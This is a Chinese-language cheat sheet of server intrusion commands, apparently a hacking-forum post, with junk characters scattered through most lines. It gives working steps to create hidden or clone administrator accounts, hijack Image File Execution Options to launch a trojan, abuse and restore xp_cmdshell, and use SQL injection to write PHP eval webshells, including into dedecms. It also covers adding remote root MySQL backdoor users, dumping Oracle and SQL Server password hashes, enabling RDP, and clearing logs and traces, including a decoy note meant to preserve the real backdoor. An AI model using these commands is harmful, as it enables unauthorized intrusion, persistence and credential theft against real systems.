; x6 K' r6 n* m. P% z3 \* C1.net user administrator /passwordreq:no& {: S! O$ C; _% @
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了/ z4 ~; K0 {0 k8 R1 q/ z
2.比较巧妙的建克隆号的步骤5 P- p6 L0 t7 J' G; |" p
先建一个user的用户
3 K& F% e G. S5 t! j8 x+ w然后导出注册表。然后在计算机管理里删掉
1 R5 C" A5 E& n在导入,在添加为管理员组
1 w5 \+ |/ T r; D3.查radmin密码 r& ^& s5 K9 T) |# v5 n9 f. ^6 n
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
: i! a2 P- i7 h4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
! u( [ z4 T% m- b$ ~! I, c4 K建立一个"services.exe"的项
- |5 C& R7 o- f再在其下面建立(字符串值)
* K. g" `" d0 }$ b$ \$ f键值为mu ma的全路径3 h" P V1 l1 L+ N, Z
5.runas /user:guest cmd+ e* n' R5 K5 n" |
测试用户权限!
: R% |( p1 r9 }) i# A7 M6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
5 _, p5 e& X4 e7 J; j7.入侵后漏洞修补、痕迹清理,后门置放:
. e+ V; R# t: K6 K8 ~" m7 O% m基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
t& b2 d0 o/ L( _* X) O2 o$ M8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
: ^5 O D; |0 m" h Q# ^- v2 X7 W% }# j+ y% v% r% a8 R
for example* H/ \9 K" f; `: b8 U2 l
2 f7 A$ L5 p, P7 _$ Z F9 }' jdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'. v% H& ?1 J5 t8 {
% m* U- y' o* M& e) s5 e! _declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'& ]6 M; z6 \& r* d
) d" _! @+ s( _5 ^; Q5 ]3 e* v5 M
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了& K+ S2 v7 z+ e. w( D& R5 v* v& w
如果要启用的话就必须把他加到高级用户模式5 k/ _; V+ S9 h/ S3 i* n
可以直接在注入点那里直接注入
) \" r0 A& |8 h7 D* Y% fid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--" K( v* _! W% z1 i D8 Y/ t
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--1 n8 ~! H- L F$ Y }
或者
& C2 r7 g' n# F, qsp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'' M6 Y, I. X/ R: x& L/ z4 F
来恢复cmdshell。
/ |8 h5 T# o3 k/ g( [; Y( G2 m! `/ {/ K! B
分析器
+ {" C( X3 A! k- G0 `. n/ s; WEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--& | y/ I) U& E% l7 m t/ S
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
1 s4 @% [2 c* q10.xp_cmdshell新的恢复办法
9 k% X) J! _- F3 h- Gxp_cmdshell新的恢复办法
& u$ V% q/ n G& s! N( }" R& i扩展储存过程被删除以后可以有很简单的办法恢复:! m( ~8 J) L0 k$ a
删除3 M q a& {0 s0 ~" j5 s
drop procedure sp_addextendedproc
. L/ w& R) T* [: W5 Ydrop procedure sp_oacreate
4 G9 O+ H* E" Y9 g* S& fexec sp_dropextendedproc 'xp_cmdshell'
2 Q( k% r- u7 w
- w3 H' n+ K7 d! S# Y恢复1 {$ ?# d2 z' B7 O1 F
dbcc addextendedproc ("sp_oacreate","odsole70.dll")6 \4 v3 W* ~6 F- J/ ?% S5 P' ]7 [" X
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
( @8 F+ _4 t( i$ I! L; N) v) n$ B
这样可以直接恢复,不用去管sp_addextendedproc是不是存在3 }6 U3 ^; S. o# A, P3 G7 |+ S' n
% J- n# L5 Z6 L" S8 Q h-----------------------------
3 [; T; f5 b+ W/ ~/ e
, ~, X$ |5 j& q4 W删除扩展存储过过程xp_cmdshell的语句:" f& A- E! l. C4 m* p) F
exec sp_dropextendedproc 'xp_cmdshell'
/ N6 B4 I( H' t" t; ?$ E: T6 d' a- \
恢复cmdshell的sql语句
l+ D! D! @0 C" zexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' J+ s2 i- s, C0 _" E, W+ o
% ?7 ?) u2 o" {* h% @9 G. F+ D" h- w0 b
开启cmdshell的sql语句 }3 n1 ~+ Q! P
6 z( j. Q& I6 `. Q# X- v! ?0 g. Aexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'& ?) j' L! \8 m1 ]
. [% S F; h, H3 U! k* m
判断存储扩展是否存在4 t }" n$ z; Z6 n% c; M8 \
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
: f6 e) M' Z, Z" w9 u9 ~返回结果为1就ok6 b2 m) y8 g' c* \" B9 @
1 I: M3 }( G$ |8 _- ~2 c
恢复xp_cmdshell" K6 y& t* `: J/ x. j% M$ V; u
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'. |" i8 F5 G/ ~, S$ r4 k' T; j
返回结果为1就ok p, L) j* I6 @" ]. t- P' Q8 ^
4 S$ C4 f1 k6 p& q! l z( u2 c否则上传xplog7.0.dll% ~* X f# y/ O) |% |( }1 y
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
: J( G7 r! _7 n# }
' a8 {" h/ k+ h2 a5 \堵上cmdshell的sql语句
) m3 `; d8 m% P! X4 Nsp_dropextendedproc "xp_cmdshel
o) I2 o$ D6 \2 X( I1 Z9 q-------------------------
& D9 h* k+ J- Z4 d$ f) L2 }清除3389的登录记录用一条系统自带的命令:, c% e. W* v0 z& i/ ]( ?
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
0 V: c6 P, K% c5 t, d. i3 ~; P* E
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件+ j' t. W( v9 {9 ~/ T. V/ V' ?
在 mysql里查看当前用户的权限
- ]5 _& F; _8 Y# n& L0 o2 yshow grants for
- [, A9 ]9 r Z
- s2 Y8 y& \" C以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
6 s9 P1 Z7 U9 I2 D" j u' c. ]
/ R$ Y* }5 a1 f: l6 R. i9 K9 n9 A g( {3 c- n& T
Create USER 'itpro'@'%' IDENTIFIED BY '123';: E( z' h5 T% L! w/ [, O. t
# u$ Z( j- v- _- ?! ?4 l' t4 t. S
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION" ^4 X) C7 G y+ j
# O4 d6 \: M+ w5 k) B" PMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0' Q! d2 I1 g9 v! r: D3 t7 @
) V- A0 U8 G5 v, k( M' nMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
) x. l. p/ c9 w5 H
) }$ Y3 y$ ^2 n' g6 x( c( Y搞完事记得删除脚印哟。; u, ?+ h' M! _
U7 M6 k4 Q1 |8 C) B0 A/ bDrop USER 'itpro'@'%';- M9 Q: z* m" q) ?
% p: M# I0 s/ ~$ s8 U6 q) X _% n
Drop DATABASE IF EXISTS `itpro` ;
# p6 _/ D* E$ M) ~, ~' e9 k
" h# }( F" m6 [1 g% I6 M* d$ d当前用户获取system权限
5 H6 \/ G1 q( ]; Esc Create SuperCMD binPath= "cmd /K start" type= own type= interact
: ^! ?4 z5 X# E$ esc start SuperCMD
2 D" T; {- \. J. i3 K7 m) ?程序代码
" ~9 `$ Z. o/ P" p<SCRIPT LANGUAGE="VBScript">) J7 Z9 ?$ w: s, i+ H( m) L
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
3 o+ |, [( @' Y8 q4 ]' m" tos="WinNT://"&wsnetwork.ComputerName
9 j* w$ T6 t( T/ V# T9 x: vSet ob=GetObject(os)
) z: }, i/ r: L+ b+ A: b3 e9 [Set oe=GetObject(os&"/Administrators,group")- b. X$ U6 }, W
Set od=ob.Create("user","nosec")
" K; [/ X9 E! v# }8 aod.SetPassword "123456abc!@#"9 B" W( \% d, j2 R
od.SetInfo
+ r$ S2 h, Q, U: h. V$ _ NSet of=GetObject(os&"/nosec",user)3 L1 \- O: B8 t, G# L: o' h
oe.add os&"/nosec"
+ L4 z0 g0 d) x; x</Script>
4 m' k% }* P3 w1 n3 S \ }<script language=javascript>window.close();</script>
5 h# \6 Q' [) m, G6 S0 [
V0 W& f; N, h' N0 c& m
) V" t8 ^ r, _) [* d9 T5 u* K; K6 i: G
. Y% ^/ j4 ]7 Q9 r3 D# q; E突破验证码限制入后台拿shell/ a% y- G3 Z% i5 s
程序代码! p4 S, ^. H |+ C D4 q9 x# u
REGEDIT4 $ A; i: ?9 |- \/ N3 C
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] ) a" d/ i9 D5 c6 _, `2 X
"BlockXBM"=dword:00000000
7 _/ v8 X& n6 K% @5 V1 G- B; G- R3 z
保存为code.reg,导入注册表,重器IE9 e/ H; S/ W6 z( {1 J- [1 ^7 H3 n# X
就可以了
/ \- S4 Y: U3 M/ ]% sunion写马 Y# b5 R$ `; ~2 Y+ U$ Z7 k
程序代码5 |; q8 U2 x. _4 |' u
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
) _7 w; a, n+ Q6 R: Y
" K$ Q# w) a( o& O \# e, ?4 {应用在dedecms注射漏洞上,无后台写马
' m3 o1 S/ X2 i$ h2 T& Pdedecms后台,无文件管理器,没有outfile权限的时候
( x, H' j3 K) }' u! i0 r在插件管理-病毒扫描里
0 b2 J* H; O. f& |# Y写一句话进include/config_hand.php里
/ w: y' K, W: \9 H程序代码9 h& H! u/ T9 H& m2 \# k* n* z
>';?><?php @eval($_POST[cmd]);?>. W/ a+ o$ g2 y9 c
5 o }. k; z; S9 D5 v, k2 b% h4 B- x
+ O* B+ \0 t, v9 G O" Z, l; a2 K如上格式 ?% E+ y* k- N# Q! i& i, S
, R) Q( t7 S, o3 r) l3 ~$ {
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
7 A- I7 z' p2 H0 w2 Y3 o$ F程序代码
. g3 \! [) Q' L2 f; T2 Dselect username,password from dba_users;) {: H# m9 I. U6 {
2 ~+ h& x# b$ _3 D
- m+ H8 ~0 B- }; S9 b; A. g- wmysql远程连接用户
/ ]: [, x1 D4 E& p程序代码
) g9 _, ]' E9 k" i+ R, q' H. p: C$ |0 a# `! r7 g3 X; \7 ?/ U$ {
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';" h# N1 k" b3 i4 v
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION- n. O% M6 l' w
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
) r+ R! S" R' G( eMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;/ R4 ? a. q1 H( V$ v9 i2 H- k4 {
0 U) \' a( }' _0 a
% B9 |- z$ Y8 u0 e+ r' e
2 x8 {+ g5 u J/ H
: m! t8 j7 c6 M' m, [4 Techo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
3 y, b0 X+ X: G* t* f7 c9 I, b& T" n2 e7 T. W
1.查询终端端口, ?$ g# d/ {' d4 M9 q5 u
0 w0 h' P: p! W
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
5 j0 C1 Y$ Y* X3 E- J8 e* y4 Q* O2 c8 d9 j8 N
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
5 }; ]$ R/ p: {1 L/ k3 Dtype tsp.reg
3 i4 g8 N" R7 E: C' F& ]+ W# k% X- o3 ~, a0 P3 J
2.开启XP&2003终端服务
M% ~ s/ y2 P3 m& ]
) r6 r, [/ n7 m* z
5 y* u( W$ I7 `) U+ n6 _REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
" B+ R7 m) s" h8 n
8 q0 r X% n0 k: a
( p9 H' L7 k3 Y) F% _REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
9 ?- f6 `# i) } D/ Z4 T; e) R/ I( h, P8 }
3.更改终端端口为20008(0x4E28)* q7 I2 T: a) z! s% W) K8 ~" f
4 p6 y C+ ]) k" F1 j9 l
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f: h# D7 K8 S: S3 d: l7 p: E- m
+ p! g- J# m$ ~( `* I& i5 U+ O' G
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f( o3 x: l8 j/ W$ j& R% x
/ e, D* _5 v! h. E% H
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
0 h9 E- W8 }7 M1 N
' c' I" f( K" o$ jREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f- V6 n# p. P: ~% S# j% R' O O6 u# l
- |+ I0 D0 l0 ^) S- p" z* D( h- p0 I* @) V4 [. F
5.开启Win2000的终端,端口为3389(需重启)
: i# L7 F! q7 Y' w* A( s8 t5 j. V
echo Windows Registry Editor Version 5.00 >2000.reg
6 _8 t$ Z/ V$ ^/ s- `echo. >>2000.reg/ c9 W" X4 x* |: K5 S [7 w
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
7 z- a5 m3 ]: K" E$ c8 ?2 x; U2 W9 g. B7 {echo "Enabled"="0" >>2000.reg
c6 m7 ]7 D9 a' Gecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
8 X4 W8 M i5 gecho "ShutdownWithoutLogon"="0" >>2000.reg
' D5 a8 p) r5 ~& \% W5 ] W+ |2 jecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
& |8 T. T; O/ ~5 L/ Lecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
: F9 w7 T Q, qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg ! X [; e; |' Z3 @: V( E
echo "TSEnabled"=dword:00000001 >>2000.reg 7 j) Q ?0 u! o! F# z! |
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg / b. W$ W- ?- W
echo "Start"=dword:00000002 >>2000.reg 3 D" Q& H* u" }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
: n: V# h9 ` Zecho "Start"=dword:00000002 >>2000.reg
4 ]" \2 T" K2 m- Fecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg ' T4 P& @% t, k! J1 G
echo "Hotkey"="1" >>2000.reg
" J0 w$ o8 B7 ^! F$ G& Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg ( T2 w7 ~, x% F. b9 N
echo "ortNumber"=dword:00000D3D >>2000.reg ( o0 v; ^4 p5 V- s
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
* v. b% b+ z. r8 i# Xecho "ortNumber"=dword:00000D3D >>2000.reg
) n* u" [0 V; I' t+ c
, _" [6 a5 s( \6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)) A$ w4 N* ]( E5 Q
8 y& p! ]8 [* }* R$ P
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
& @$ g8 E, i- R& S4 G. |3 X* G Q8 R(set inf=InstallHinfSection DefaultInstall)
, A9 [6 d) m2 P" m5 y8 h, M% Aecho signature=$chicago$ >> restart.inf8 T; Z; _, ]' z/ I+ G5 V0 T8 ]
echo [defaultinstall] >> restart.inf3 Y( F) }: t4 P0 f9 ~
rundll32 setupapi,%inf% 1 %temp%\restart.inf
+ A5 x0 s# q$ |
. H. U& b' }$ ^3 L9 C! @
) b3 D% e, W7 R7 M0 b( \1 ` D7.禁用TCP/IP端口筛选 (需重启)' T4 G4 A& B' L8 d( y
* W/ u& j; [6 Q4 J0 Q
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f/ g- D' _* w3 A
5 K1 ?! E: q; V/ G1 ^8.终端超出最大连接数时可用下面的命令来连接$ \0 h3 Z1 b6 L. @2 j: l0 o. S
; G6 c/ y _2 B, j0 f& V! x. Xmstsc /v:ip:3389 /console
! i7 \2 C; o3 k( w2 F# J8 h- m8 X9 X- @/ J
9.调整NTFS分区权限
+ J: a# L4 C- r: q% C# x" ~& N3 r$ W+ \# U) {- b! m
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)* q8 Y8 L. Z0 Z% b
4 i8 [ `* M7 g. Z5 h$ ~6 g
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
: P8 d2 c+ e4 E1 R8 J6 l
7 h) q h9 V, f------------------------------------------------------
, z6 y h8 I/ h" F2 m3389.vbs
: j: ^1 v B2 G4 n0 L( K8 z; @On Error Resume Next; w/ @! b0 J9 }4 W! @+ ^, K4 Q6 I
const HKEY_LOCAL_MACHINE = &H80000002
; k! V. Y+ {7 V- C6 D4 DstrComputer = "."( |" p3 j" U2 H+ W& H" ?5 u! X
Set StdOut = WScript.StdOut
( K3 w) a" E% y0 {: ^% NSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_4 K# p9 z; |5 \6 r% w5 z4 V7 E
strComputer & "\root\default:StdRegProv")9 w) m. \- W# d5 `1 [
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
# y. y- h! x" ]0 L l3 m3 Z9 Goreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath. ?5 r- J" C9 O6 w! w c
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
, C# a7 W7 {3 N- ^( zoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
% ~, k2 y, a5 H2 ` ?strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"2 A1 v7 |% y# c. A; l2 c
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
* W0 C9 T! L& r2 x% q; ^* n! _strValueName = "fDenyTSConnections"
6 g+ S% f4 \ b( odwValue = 0
. [8 a6 F( z- Y# u, Y8 w5 L# Q" goreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
. Q# Y0 F( ~: o8 A1 T& i- [strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
, B) B( ]7 _! g, f/ d) nstrValueName = "ortNumber" ?. z3 o f! I/ ~; k% h7 Z& R
dwValue = 3389
, A" M$ z7 t# K, s+ koreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
& l7 B$ K9 u5 Z4 n8 EstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp". `" z& N+ N( J1 \
strValueName = "ortNumber") ~3 S7 H8 l2 ?9 d, P' o4 P
dwValue = 33899 ^1 N# `7 r& S0 `! W/ d5 m
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue6 C9 _3 e4 Y( l* u# o E+ d6 d
Set R = CreateObject("WScript.Shell") 1 H2 t. R9 ^$ V |& U4 ?& a
R.run("Shutdown.exe -f -r -t 0")
# d, p# } e2 A ~, U0 v6 ] B3 {4 t2 G- t% V$ L& _& C
删除awgina.dll的注册表键值
: d% G6 ]' u5 v3 D7 I$ u! \程序代码7 {% [# D; i- w( e: G0 [
% x1 N, v$ {& |( L$ k! g
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
9 Q2 R1 u& Q% @7 t1 h6 u8 \
7 {% T D5 G" k5 d3 \* n d+ A! y/ M5 U7 V. R( W) Z* @
( P3 U# @0 |- A& ~; L
' Z" {# }* G7 m8 S3 c5 `. R: `程序代码
" ]5 R) k3 g4 a. V' y0 m: wHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash# z3 O( y3 v: o. d& r: D
1 s1 H- e$ w# M5 T设置为1,关闭LM Hash
6 R0 h/ j; v+ W$ G
: m5 K P& U; p# e- `& }( i7 s* _; L数据库安全:入侵Oracle数据库常用操作命令 k8 N2 X" `" ]+ u" m7 D
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。9 V2 c8 c4 {5 }6 ?# K+ A
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。) l8 O" N% }5 a# R+ ^/ C& ]
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;5 P8 o/ e( ?* W+ z7 [1 n& H) m
3、SQL>connect / as sysdba ;(as sysoper)或& g. K4 h9 z4 E1 ~' C
connect internal/oracle AS SYSDBA ;(scott/tiger)
0 O8 x, a$ e: V- _3 r7 {: Gconn sys/change_on_install as sysdba;
/ d. m! V: I) n4、SQL>startup; 启动数据库实例
9 B9 M5 ?* N* i$ w5、查看当前的所有数据库: select * from v$database;
# e& c0 C( Z3 ]' N( y) bselect name from v$database;7 ^( ?% t7 t, Y
6、desc v$databases; 查看数据库结构字段
9 P' T3 j. D8 u- p- E6 H7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
, X+ J) n; |) a% l! O+ `SQL>select * from V_$PWFILE_USERS;9 j4 H$ l% L6 u6 B# j8 q! n# s
Show user;查看当前数据库连接用户1 k: w/ ]! f; w* U, T: S
8、进入test数据库:database test;
- ^; W0 F# E! C% X' y! ]9、查看所有的数据库实例:select * from v$instance;
! c) \) b- p3 ]9 C) B如:ora9i
5 z2 Z& p5 n! n' z$ D$ z4 @: `10、查看当前库的所有数据表:
0 I- x# e4 A! p: H6 `3 `, v" }SQL> select TABLE_NAME from all_tables;) Z7 z0 Q9 p! E/ b7 F
select * from all_tables;$ ]) V- w. ^, I L; ?1 ~/ f) k
SQL> select table_name from all_tables where table_name like '%u%';3 O l; U6 V1 p
TABLE_NAME
" [- ]" K: N+ g4 ]' x3 P w------------------------------' { c; b7 ^* n/ V
_default_auditing_options_
+ }8 j, K- P" G) }% t11、查看表结构:desc all_tables;3 w' B$ \# v, ~" G$ c
12、显示CQI.T_BBS_XUSER的所有字段结构:
; [: L5 a4 k' Adesc CQI.T_BBS_XUSER;6 j, k- Z8 J% n' ~ v2 |- P
13、获得CQI.T_BBS_XUSER表中的记录:
9 V% j) O T9 I, M# |' d4 c) n9 hselect * from CQI.T_BBS_XUSER;! V; m L# V B
14、增加数据库用户:(test11/test)' k0 y& d2 h% [' K; e. M
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;* ~: h1 Y3 p; s: r0 p! p
15、用户授权:- e/ w7 [) y* k
grant connect,resource,dba to test11;
# g( o! b" ^# a2 w; }5 \9 n6 Ngrant sysdba to test11;
. g' g* `3 @+ X, H. ?/ O" Wcommit;
6 ]2 D; c4 c: R0 G) N7 B16、更改数据库用户的密码:(将sys与system的密码改为test.)/ N% ?4 m7 }( `
alter user sys indentified by test;
1 w) B. b) [) k1 xalter user system indentified by test;
7 x: o3 J9 O1 ?# h, c% B6 z* h6 ^2 f) p3 |
applicationContext-util.xml. e( }5 |) D# F+ d2 n' f7 i* A
applicationContext.xml* i! R! M- C: f5 C* Q1 e: N9 }
struts-config.xml2 k# E& n) M# z v. ^* ^
web.xml" c8 o7 h8 b7 d: c4 |
server.xml
; y) _) V( z' Y7 g5 p: _, ytomcat-users.xml
' n+ `9 a% L; V& X% xhibernate.cfg.xml" }( ?* H, f( Z: n1 k
database_pool_config.xml1 `$ a5 g* p2 k" b" J
! I9 n X' ^: x9 f# t: ?, p, x" p
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置! S8 q7 R5 r+ T7 K! q3 V
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
- T) ?' B/ |1 t2 ~ l& ~8 }\WEB-INF\struts-config.xml 文件目录结构. X ~$ g# x( i- f
. l0 { Q, E3 qspring.properties 里边包含hibernate.cfg.xml的名称
0 z( b# K) O+ ^+ b2 i! H& v& P' o6 \! {' x5 M" L8 W3 H7 p
1 O+ C# E1 r* _
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
6 v' O% {; D0 h. |& I3 x" z6 Z, E
/ P# O# @) [' S: O# F如果都找不到 那就看看class文件吧。。% i7 S/ v# Y. U+ L
3 g6 Y& n# c1 d L+ N( T
测试1:, [# C1 H' a) _0 f, n$ |4 P
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
) ?1 x$ ?$ B) ^4 q
' y: q( ?+ j+ m6 O$ J% V测试2:: N7 E, c4 i; A8 m5 I. ?6 b
$ p5 J9 o6 o2 o! [* c/ ncreate table dirs(paths varchar(100),paths1 varchar(100), id int)( Q- R( T. i( u- `" C p: }
- Z- A$ C* Z$ }delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--4 @ c8 }9 l, G" p
( a& F8 y1 Q0 k" r; N" m ]
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
& c# t% g5 ? Z* [( H9 \ ^8 ] \" G( n
' L! I5 y# ^" T) K' n2 E查看虚拟机中的共享文件:
: O9 r- ^6 z6 l; t/ Y1 B在虚拟机中的cmd中执行
; D# ~# L7 n4 j2 o I\\.host\Shared Folders, L6 _) O. w1 n8 p4 H2 O" d
0 H" T* g) a0 X# U) g0 I; K, Wcmdshell下找终端的技巧
3 |% W3 w6 z" c找终端: : q8 e2 M) U- C9 B6 }, U
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! ' T1 S4 u3 m, m) c# f+ l
而终端所对应的服务名为:TermService : @7 r- r( P, U7 o6 ?, w, h, q @
第二步:用netstat -ano命令,列出所有端口对应的PID值!
/ ~9 B* m# \' D" c' e 找到PID值所对应的端口
1 g8 V! l% t- m7 D3 D) r+ Y5 d6 y; t/ P5 G: @- b
查询sql server 2005中的密码hash
8 {7 ^: h7 U: A/ aSELECT password_hash FROM sys.sql_logins where name='sa'
* r: Y7 K7 M9 f" t+ u FSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a1 Z8 A; D5 g$ ?4 j; `
access中导出shell8 u( F6 l: z5 t" I
2 w8 U, u0 Z5 D) m. S j& @( g3 b8 g
中文版本操作系统中针对mysql添加用户完整代码:
, Q0 ~6 ]( u+ o* [8 n
, I# [4 J- X' N _& R: M. puse test;# j+ G, t) P& _1 b) P, _
